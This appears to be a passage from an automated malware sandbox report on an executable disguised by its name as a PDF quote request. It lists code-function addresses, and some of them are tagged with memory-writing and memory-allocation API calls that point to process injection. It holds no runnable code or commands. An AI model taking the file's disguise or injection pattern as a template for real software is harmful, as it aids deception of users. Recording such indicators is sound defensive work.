      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B77390_2_020B7739
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B77450_2_020B7745
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B775D0_2_020B775D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B77510_2_020B7751
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B776E0_2_020B776E
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B77900_2_020B7790
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94810_2_020B9481
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94CA0_2_020B94CA
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94C80_2_020B94C8
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B84C50_2_020B84C5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94D50_2_020B94D5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94E10_2_020B94E1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B74FD0_2_020B74FD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B74F10_2_020B74F1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B850C0_2_020B850C
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B752E0_2_020B752E
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B75390_2_020B7539
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B75450_2_020B7545
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B75680_2_020B7568
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BB5620_2_020BB562
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B85940_2_020B8594
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B85AD0_2_020B85AD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B85A10_2_020B85A1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B85B90_2_020B85B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B75E90_2_020B75E9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9A010_2_020B9A01
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9A040_2_020B9A04
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9A1D0_2_020B9A1D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A120_2_020B7A12
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9A110_2_020B9A11
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9A290_2_020B9A29
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9A350_2_020B9A35
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A7D0_2_020B7A7D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A710_2_020B7A71
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9A750_2_020B9A75
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A890_2_020B7A89
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9A8D0_2_020B9A8D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9A810_2_020B9A81
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7AED0_2_020B7AED
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9B250_2_020B9B25
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9B3D0_2_020B9B3D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B4D0_2_020B7B4D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B410_2_020B7B41
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B590_2_020B7B59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9B600_2_020B9B60
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B650_2_020B7B65
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9B7D0_2_020B9B7D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9B710_2_020B9B71
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9B890_2_020B9B89
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BDB820_2_020BDB82
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9B980_2_020B9B98
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BBD0_2_020B7BBD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BC90_2_020B7BC9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9BDA0_2_020B9BDA
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BD50_2_020B7BD5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BE10_2_020B7BE1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9BE50_2_020B9BE5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9BFD0_2_020B9BFD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9BF10_2_020B9BF1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B782D0_2_020B782D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BD8720_2_020BD872
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B78800_2_020B7880
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B78990_2_020B7899
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B78A50_2_020B78A5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B98DD0_2_020B98DD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B79150_2_020B7915
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B792D0_2_020B792D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B79210_2_020B7921
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99790_2_020B9979
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B799D0_2_020B799D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B79910_2_020B7991
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99910_2_020B9991
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B79A90_2_020B79A9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99BD0_2_020B99BD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99DD0_2_020B99DD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99D00_2_020B99D0
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99E90_2_020B99E9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99F50_2_020B99F5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E400_2_020B7E40
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E470_2_020B7E47
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E590_2_020B7E59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E650_2_020B7E65
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E790_2_020B7E79
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7EC20_2_020B7EC2
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F3D0_2_020B7F3D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F310_2_020B7F31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B6F8A0_2_020B6F8A
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F810_2_020B7F81
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B6F950_2_020B6F95
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B6FA10_2_020B6FA1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7FA50_2_020B7FA5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9C090_2_020B9C09
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C3D0_2_020B7C3D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C310_2_020B7C31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C7A0_2_020B7C7A
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9C880_2_020B9C88
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C850_2_020B7C85
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9C950_2_020B9C95
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7CA90_2_020B7CA9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9CAD0_2_020B9CAD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9CA10_2_020B9CA1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8CFB0_2_020B8CFB
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9CFD0_2_020B9CFD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9CF10_2_020B9CF1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9D090_2_020B9D09
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7D250_2_020B7D25
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7D310_2_020B7D31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FFD98_2_0056FFD9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FFC08_2_0056FFC0
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FFE58_2_0056FFE5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B2725 NtWriteVirtualMemory,TerminateProcess,0_2_020B2725
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9405 NtAllocateVirtualMemory,0_2_020B9405
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BEA59 NtWriteVirtualMemory,NtProtectVirtualMemory,0_2_020BEA59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BEF41 NtOpenFile,0_2_020BEF41
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8209 NtWriteVirtualMemory,0_2_020B8209
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8215 NtWriteVirtualMemory,0_2_020B8215
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8221 NtWriteVirtualMemory,0_2_020B8221
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B826D NtWriteVirtualMemory,0_2_020B826D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8279 NtWriteVirtualMemory,0_2_020B8279
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8285 NtWriteVirtualMemory,0_2_020B8285
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82ED NtWriteVirtualMemory,0_2_020B82ED
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82F9 NtWriteVirtualMemory,0_2_020B82F9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8308 NtWriteVirtualMemory,0_2_020B8308
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8369 NtWriteVirtualMemory,0_2_020B8369
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B83E1 NtWriteVirtualMemory,0_2_020B83E1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8031 NtWriteVirtualMemory,0_2_020B8031
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8086 NtWriteVirtualMemory,0_2_020B8086
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B809D NtWriteVirtualMemory,0_2_020B809D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8091 NtWriteVirtualMemory,0_2_020B8091
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B80A9 NtWriteVirtualMemory,0_2_020B80A9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8105 NtWriteVirtualMemory,0_2_020B8105
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B811D NtWriteVirtualMemory,0_2_020B811D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8111 NtWriteVirtualMemory,0_2_020B8111
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8129 NtWriteVirtualMemory,0_2_020B8129
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81B9 NtWriteVirtualMemory,0_2_020B81B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81C5 NtWriteVirtualMemory,0_2_020B81C5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81DD NtWriteVirtualMemory,0_2_020B81DD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81D1 NtWriteVirtualMemory,0_2_020B81D1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81F8 NtWriteVirtualMemory,0_2_020B81F8
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8609 NtWriteVirtualMemory,0_2_020B8609
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B760D NtWriteVirtualMemory,0_2_020B760D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7619 NtWriteVirtualMemory,0_2_020B7619
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8615 NtWriteVirtualMemory,0_2_020B8615
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9629 NtAllocateVirtualMemory,0_2_020B9629
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B862D NtWriteVirtualMemory,0_2_020B862D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8621 NtWriteVirtualMemory,0_2_020B8621
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7625 NtWriteVirtualMemory,0_2_020B7625
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7631 NtWriteVirtualMemory,0_2_020B7631
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9635 NtAllocateVirtualMemory,0_2_020B9635
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B964D NtAllocateVirtualMemory,0_2_020B964D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9641 NtAllocateVirtualMemory,0_2_020B9641
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7664 NtWriteVirtualMemory,0_2_020B7664
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9685 NtAllocateVirtualMemory,0_2_020B9685
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76B9 NtWriteVirtualMemory,0_2_020B76B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76C5 NtWriteVirtualMemory,0_2_020B76C5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B86C4 NtWriteVirtualMemory,0_2_020B86C4
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76DD NtWriteVirtualMemory,0_2_020B76DD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76D1 NtWriteVirtualMemory,0_2_020B76D1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B96FD NtAllocateVirtualMemory,0_2_020B96FD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B86FC NtWriteVirtualMemory,0_2_020B86FC
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B870C NtWriteVirtualMemory,0_2_020B870C
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B871D NtWriteVirtualMemory,0_2_020B871D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8729 NtWriteVirtualMemory,0_2_020B8729
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7739 NtWriteVirtualMemory,0_2_020B7739
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8735 NtWriteVirtualMemory,0_2_020B8735
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7745 NtWriteVirtualMemory,0_2_020B7745
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B775D NtWriteVirtualMemory,0_2_020B775D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7751 NtWriteVirtualMemory,0_2_020B7751
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B776E NtWriteVirtualMemory,0_2_020B776E
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7790 NtWriteVirtualMemory,0_2_020B7790
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9481 NtAllocateVirtualMemory,0_2_020B9481
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94CA NtAllocateVirtualMemory,0_2_020B94CA
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94C8 NtAllocateVirtualMemory,0_2_020B94C8
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B84C5 NtWriteVirtualMemory,0_2_020B84C5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94D5 NtAllocateVirtualMemory,0_2_020B94D5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94ED NtAllocateVirtualMemory,0_2_020B94ED
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94E1 NtAllocateVirtualMemory,0_2_020B94E1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B74FD NtWriteVirtualMemory,0_2_020B74FD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B74F1 NtWriteVirtualMemory,0_2_020B74F1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B850C NtWriteVirtualMemory,0_2_020B850C
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9518 NtAllocateVirtualMemory,0_2_020B9518
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B752E NtWriteVirtualMemory,0_2_020B752E
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7539 NtWriteVirtualMemory,0_2_020B7539
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7545 NtWriteVirtualMemory,0_2_020B7545
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B959E NtAllocateVirtualMemory,0_2_020B959E
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8594 NtWriteVirtualMemory,0_2_020B8594
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B95A9 NtAllocateVirtualMemory,0_2_020B95A9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B85AD NtWriteVirtualMemory,0_2_020B85AD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B85A1 NtWriteVirtualMemory,0_2_020B85A1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B85B9 NtWriteVirtualMemory,0_2_020B85B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B95B5 NtAllocateVirtualMemory,0_2_020B95B5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B95CD NtAllocateVirtualMemory,0_2_020B95CD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B95C1 NtAllocateVirtualMemory,0_2_020B95C1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B75E9 NtWriteVirtualMemory,0_2_020B75E9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A12 NtWriteVirtualMemory,0_2_020B7A12
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A7D NtWriteVirtualMemory,0_2_020B7A7D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A71 NtWriteVirtualMemory,0_2_020B7A71
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A89 NtWriteVirtualMemory,0_2_020B7A89
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7AED NtWriteVirtualMemory,0_2_020B7AED
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B4D NtWriteVirtualMemory,0_2_020B7B4D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B41 NtWriteVirtualMemory,0_2_020B7B41
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B59 NtWriteVirtualMemory,0_2_020B7B59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B65 NtWriteVirtualMemory,0_2_020B7B65
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BBD NtWriteVirtualMemory,0_2_020B7BBD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BC9 NtWriteVirtualMemory,0_2_020B7BC9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BD5 NtWriteVirtualMemory,0_2_020B7BD5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BE1 NtWriteVirtualMemory,0_2_020B7BE1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B782D NtWriteVirtualMemory,0_2_020B782D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B887D NtWriteVirtualMemory,0_2_020B887D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7880 NtWriteVirtualMemory,0_2_020B7880
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7899 NtWriteVirtualMemory,0_2_020B7899
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B78A5 NtWriteVirtualMemory,0_2_020B78A5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7915 NtWriteVirtualMemory,0_2_020B7915
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B792D NtWriteVirtualMemory,0_2_020B792D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7921 NtWriteVirtualMemory,0_2_020B7921
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B799D NtWriteVirtualMemory,0_2_020B799D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7991 NtWriteVirtualMemory,0_2_020B7991
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B79A9 NtWriteVirtualMemory,0_2_020B79A9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E40 NtWriteVirtualMemory,0_2_020B7E40
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E47 NtWriteVirtualMemory,0_2_020B7E47
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E59 NtWriteVirtualMemory,0_2_020B7E59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E65 NtWriteVirtualMemory,0_2_020B7E65
